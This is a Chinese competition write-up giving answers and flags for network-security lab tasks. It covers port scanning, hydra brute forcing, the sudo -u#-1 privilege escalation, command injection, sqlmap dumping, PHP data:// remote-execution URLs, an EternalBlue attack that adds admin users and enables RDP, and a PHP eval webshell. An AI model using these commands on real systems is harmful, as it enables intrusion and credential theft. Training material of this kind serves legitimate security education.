任务一:服务器内部信息获取

任务环境说明:

  • 服务器场景:Server210510(关闭链接)
  • 服务器场景操作系统:Linux
  • 用户名:test密码:123456
  1. 收集服务器场景中的服务信息。并获取服务器中开放的端口号信息,将服务器端口号作为flag提交(如果有多个端口以;分割,如11;22;33);

这题 没要求版本号,只要求端口号,可以用-sS, 要全面再加上-p-
nmap -p- -sS

Flag[22;111;6000]

2、将服务器中tmp文件夹下的字典下载至本地,并将字典中最后一位用户名作为flag提交;

Flag[BqMkbn]

3、应用工具获取服务器中黑客账户的密码。并将黑客的密码作为flag提交;

Flag[xhm9NG]

4、在服务器中查看sudo软件的版本,将sudo的版本号作为flag提交;

Flag[1.8.23]

5、在服务器中登录恶意用户,查看恶意用户在服务器中输入的第一条指令,将指令作为flag提交;

先对恶意用户进行爆破

可以使用hydra更快一点

1) 使用字典对目标服务进行破解。

hydra -L users.txt -P password.txt ssh://127.0.0.1

2) 当目标服务开放的端口不是默认端口时,使用 -s 进行指定。

hydra  -L user.txt -P password.txt  ssh://127.0.0.1  -s 77744

3)将破解的密码存储到指定文件。

hydra  -L users.txt -P password.txt  ssh://127.0.0.1  -s 40 -o ssh.txt

hydra破解不同协议的密码

​#破解ssh:        hydra -L users.txt -P password.txt -vV -o ssh.log -e ns IP ssh

#破解https:     hydra -m /index.php -l username -P pass.txt IP https

#破解teamspeak: hydra -l 用户名 -P 密码字典 -s 端口号 -vV ip teamspeak

#破解cisco:     hydra -P pass.txt IP cisco

hydra -m cloud -P pass.txt 127.0.0.1 cisco-enable

#破解smb:       hydra -l administrator -P pass.txt IP smb

#破解pop3:      hydra -l muts -P pass.txt my.pop3.mail pop3

#破解rdp:       hydra IP rdp -l administrator -P pass.txt -V

#破解http-proxy: hydra -l admin -P pass.txt http-proxy://127.0.0.1

#破解telnet:     hydra IP telnet -l 用户 -P 密码字典 -t 32 -s 23 -e ns -f -V

#破解ftp:       hydra IP ftp -l 用户名 -P 密码字典 -t 线程(默认16) -vV

#get方式提交,破解web登录:

hydra IP ftp -l 用户名 -P 密码字典 -e ns -vV

hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns IP http-get /admin/

hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns -f IP http-get /admin/index.php

这题可以用:

hydra 靶机地址 -l用户 -P 字典 -s 端口 服务

这里我使用的是msf中的ssh_login爆破模块

查看第一条指令:history

Flag[whoami]

6、在服务器中查看用户信息,将最后一个用户的用户名作为flag提交;

使用恶意用户打开文件

查看用户信息:cat /etc/shadow

Flag[Stand_by_me]

任务二:网站渗透测试

任务环境说明:

  • 服务器场景:Server2100(关闭链接)
  • 服务器场景操作系统:未知
  • 用户名:未知 密码:未知

收集服务器场景中的服务信息。并获取服务器中开放的端口号信息,将服务器网站端口号作为flag提交;

使用nmap扫描发现网页端口是8081

Flag[8081]

  1. 扫描服务器网站路径,在网站路径下找到flag页面,将flag提交;

使用dirbuster进行目录扫描

目录为/usr/share/dirbuster/wordlist

扫描出目录evl.php

尝试输入127.0.0.1|ls 找到flag

flag=4ddyMING8sVRYMQ

2、在服务器网站中找到危险网页,并将网页标题中的flag值提交;

并发现危险目录command

直接查看源码找到flag

Flag[flag:Windows_Command_Prompt]

3、在网站中获取flag网页的拥有者和拥有组,并将拥有组作为flag提交;

注入命令127.0.0.1|ls -l

Flag[6TU9t3Sic8K1h3]

4、在网站中,打开flag页面查看内容,并将内容作为flag提交;

输入|ls-l发现没有权限进行赋权

127.0.0.1| chmod 777 [flag文件名]

flag[SgU5CZVcr6]

5、使用apache自带压力测试工具对服务器网站根目录测试,将服务器网站中回显信息的文件数值长度作为flag提交;

对服务器为进行压力测试

ab -n 100 -c 10 http://靶机地址:端口/

解读:使用ab压力测试工具 -n 发送100次请求 -c模拟10个用户

Flag[4897 bytes]

任务四:Linux系统渗透提权

任务环境说明:

  • 服务器场景:Server2204(关闭链接)
  • 用户名:hacker        密码:123456

sudo

  1. 使用渗透机对服务器信息收集,并将服务器中SSH服务端口号作为flag提交;

使用nmap进行扫描发现ssh端口为2283

nmap -sV -p- -O

Flag[2283]

2、使用渗透机对服务器信息收集,并将服务器中主机名称作为flag提交;

直接ssh登录

hostname

Flag[KipZ1eze]

3、使用渗透机对服务器信息收集,并将服务器中系统内核版本作为flag提交;

uname -r查看版本号

Flag[2.6.32-642.el6.x86_64]

4、使用渗透机对服务器管理员提权,并将服务器中root目录下的文本内容作为flag提交;

使用sudo提权

sudo -u#-1 ls -l /root

找到文件直接cat

sudo -u#-1 cat /root/key.txt

Flag[7QcSI8kK]

5、使用渗透机对服务器管理员提权,并将服务器中root的密码作为flag提交;

继续使用sudo拿到root的hash值

sudo -u#-1 cat /etc/shadow

拿到hash值后返回kali使用john进行解密

注:需要先放到文本里面

echo 'hash值'>文件名

在使用john进行解密

john 文件名

Flag[Woodrow]

6、使用渗透机对服务器管理员提权,并将服务器中root目录下的图片内容作为flag提交。

拿到root账号密码了就可以自由发挥了

思路:可以用Windows7中的winscp进行登录获取文件

Flag[]

任务五:Web渗透测试

任务环境说明:

  • 服务器场景:Server2103(关闭链接)
  • 服务器场景操作系统:未知

HTTP 前台 sqlmap

进行扒库

使用sqlmap

找到注入点

sqlmap -u "注入点网址" --batch

获取基本信息

--dbs获取所有的数据库名

sqlmap -u "注入点网址" --dbs --batch

--current-db获取当前数据库用户

sqlmap -u "注入点网址" --current-db --batch

--current-user获取当前数据库用户

sqlmap -u "注入点网址" --current-user –batch

--is-dba检测DBMS当前用户是否DBA

sqlmap -u "注入点网址"  --is-dba –batch

使用-D指定数据库,使用--tables获取指定数据库的所有表

sqlmap -u "注入点网址" -D cimer --tables --batch

使用-T指定表,使用--columns获取指定表的所有字段

sqlmap -u "注入点网址" -D cimer -T admin --columns --batch

使用-C指定字段,使用--dump获取指定字段的所有值

sqlmap -u "注入点网址" -D cimer -T admin -C username,password --dump --batch

目的拿到后台登陆界面账号密码进行文件上传

思路:可以上传图片马

也可以直接进行远程执行

  1. 通过本地PC中的渗透测试平台Kali对靶机进行WEB渗透,找到页面内的文件上传漏洞并且尝试进行上传攻击,将文件上传成功后的页面回显字符串作为Flag提交(如:点击超链接查看上传文件)

先在输入框中|ls查看后台

找到后台使用爆出的账号密码登录并上传文件得到flag

Flag[文件上传成功, 点击预览]

2、通过本地PC中的渗透测试平台Kali对靶机进行WEB渗透,找到页面内的文件上传漏洞并且尝试进行上传攻击,使用相关的渗透测试手段,获取到WEB权限,使用WHOAMI获取WEB当前的用户权限,并作为Flag进行提交;

远程执行: https://172.16.101.250/system_wws/include.php?file=data://text/plain,<?php system("whoami");?>

Flag[]

3、通过本地PC中的渗透测试平台Kali对靶机进行WEB渗透,找到页面内的文件上传漏洞并且尝试进行上传攻击,使用相关的渗透测试手段,获取到WEB权限,使用相关指令获取到当前linux用户UID为5的用户,将该用户的用户名称作为Flag进行提交;

远程执行:

https://172.16.101.250/system_wws/include.php?file=data://text/plain,<?php system("cat /etc/passwd");?>

Flag[]

4.通过本地PC中的渗透测试平台Kali对靶机进行WEB渗透,找到页面内的文件上传漏洞并且尝试进行上传攻击,使用相关的渗透测试手段,获取到WEB权限,使用相关指令查看后台首页文件,将该文件的第二行的所有字符串作为Flag进行提交;

远程执行:

https://172.16.101.250/system_wws/include.php?file=data://text/plain,<?php system("cat /var/www/html/houtai/index.php");?>

https://172.16.101.250/system_wws/include.php?file=data://text/plain,%3C?php%20system(%22cat%20%20/var/www/html/houtai/index.php%22);?%3E

Flag[]

混战:

对于windows

攻击:

msf中ms17_010永恒之蓝(手速要快)

进入meterpreter

提权

输入:getuid(拿到“SYSTEM ”权限)

shell,进入dos命令下,进入后再在输入:chcp 65001(取消乱码)

添加管理员用户

方法一:

run getgui -u user1 -p 123   #添加用户

方法二:

set CMD cmd.exe /c net user hacker 123456 /add 添加用户

set CMD cmd.exe /c net localgroup administrators hacker /add  将hacker用户加至管理员组

如果没有开启远程桌面:

开启远程桌面:meterpreter > run post/windows/manage/enable_rdp

run getgui -e #开启远程桌面

set CMD cmd.exe /c REG ADD HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal\” \”Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f  开启远程桌面

加固:

第一种:

以管理员身份进入cmd关闭rdr、srv、netbt服务

下面的cmd命令比较暴力(会导致网络问题),谨慎使用:

net stop srv /y
sc config srv start= disabled
net stop rdr /y
net stop netbt /y

第二种:

找到server服务进行停止

对于Linux

攻击:

不建议:进行密码爆破

推荐:

可以进行web渗透获取靶机权限

文件上传

传一句话木马

<?php @eval($_POST['cmd'])?>

加固:

菜刀进去之后直接删除web页面

2022淮安市第十七届职业学校技能大赛网络安全题解WP相关推荐

  1. 晋中市中等职业学校技能大赛

    简介 晋中市中等职业学校技能大赛由由晋中市教育局.晋中市人力资源和社会保障局主办. 历届 届数 年份 时间 地点 备注 第十四届 2022 9月28日-9月30日 平遥现代工程技术学校 第十三届 20 ...

  2. 山西省第十届计算机技能大赛,《附件2山西省第十届职业院校技能大赛比赛方案》.doc...

    <附件2山西省第十届职业院校技能大赛比赛方案>.doc 附件2: ??? 一.大赛名称:山西省第届职业院校技能大赛 ??? 二.比赛时间:201年月??? 三.比赛地点:四.主办和承办单位 ...

  3. 山西省第十届计算机技能大赛,附件2山西省第十届职业院校技能大赛比赛方案.doc...

    附件2山西省第十届职业院校技能大赛比赛方案.doc 附件2: ??? 一.大赛名称:山西省第届职业院校技能大赛 ??? 二.比赛时间:201年月??? 三.比赛地点:四.主办和承办单位: 主办单位:山 ...

  4. 计算机硬件人员专业知识技能,2017年江苏省职业学校技能大赛(计算机硬件)竞赛实施方案...

    2017年江苏省职业学校技能大赛 信息技术类项目竞赛实施方案 计算机硬件检测项目 1.理论知识部分 模拟及数字电路基础.台式机主板电路工作原理.维修工具及使用知识. 数据恢复技术(包括数制.数据结构基 ...

  5. 2016江苏省盗取计算机技术,2016年江苏省职业学校技能大赛物联网技术应用与维护公开题库...

    内容简介: 2016年江苏省职业学校技能大赛物联网技术应用与维护公开题库 [0001-07441101-5058ad5c][判断题][易][物联网概论][正确] 1.( )可控性能够控制与限定网络用户 ...

  6. 星光计划计算机,上海星光计划第七届职业院校技能大赛.PDF

    上海市"星光计划" 第七届职业院校技能大赛 数字影视后期制作 决赛方案 上海市星光计划组委会竞赛办公室 二○一六年十二月 目 录 1. 简介  1 1.1 项目名称  1 数字影音 ...

  7. 江苏省有JAVA技能大赛,江苏省职业学校技能大赛组委会

    江苏省职业学校技能大赛组委会 2011年第五号公告 现将部分专业相关要求公告如下: 一.农业类: 1.种子质量检测项目操作技能所用天平原为托盘天平现改为电子天平,型号为SE602F. 2.园林植物修剪 ...

  8. 2023年武汉市中等职业学校技能大赛 “网络搭建与应用”

    2023年武汉市中等职业学校技能大赛 "网络搭建与应用" 一.竞赛内容分布 "网络搭建及应用"竞赛共分二个部分,其中: 第一部分:企业网络搭建部署项目,占总分的 ...

  9. 2022-2023年度江苏省职业院校技能大赛“网络安全”赛项中职组圆满成功

    2022-2023年度江苏省职业院校技能大赛"网络安全"赛项中职组圆满成功!

最新文章

  1. pandas KeyError [‘1‘] not found in axis 错误的解决方法
  2. python列表字典操作_Python 列表(list)、字典(dict)、字符串(string)常用基本操作小结...
  3. ubuntu 进入 recovery mode
  4. python自定义类如何定义向量的模_gensim的word2vec如何得出词向量(python)
  5. python json.loads()中文问题-解决Python下json.loads()中文字符出错的问题
  6. centos7中安装JDK8-281版本
  7. MVC中使用Entity Framework 基于方法的查询学习笔记 (二)
  8. 前端学习(3266):js中this的指向
  9. 一个男生写的关于怎么追女生昨天没有说一个很关键的东西
  10. 【R】数据框data.frame的基本操作【1】
  11. python学习第21天
  12. 计算机系统动态库修复,xp系统恢复dll动态链接库的修复步骤
  13. 全国地址SQL数据文件(精确到区县)
  14. searchbar.wxss源代码
  15. Forth语言简明教程
  16. GitHub官网访问慢的解决问题
  17. python 经纬度计算相关
  18. QQ如何开通在线客服
  19. 如何选择最适合自己的地图软件
  20. js判断当前设备和获取设备、浏览器宽高

热门文章

  1. Failed to load the native TensorFlow runtime : error while importing tensorflow ——问题解决
  2. linux cpio grub 参数,Linux 备份压缩 : cpio 命令详解
  3. Redis缓存穿透-热点缓存并发重建-缓存与数据库双写不一致-缓存雪崩
  4. CSS border-radius 新玩法(含可视化生成工具)
  5. js中的闭包问题(持续更新)
  6. JVM学习笔记——class文件结构
  7. java PropertyDescriptor分析
  8. qrcodejs二维码
  9. 现代民机“飞行管理系统(FMS)”的功能和组成
  10. void* 指针赋值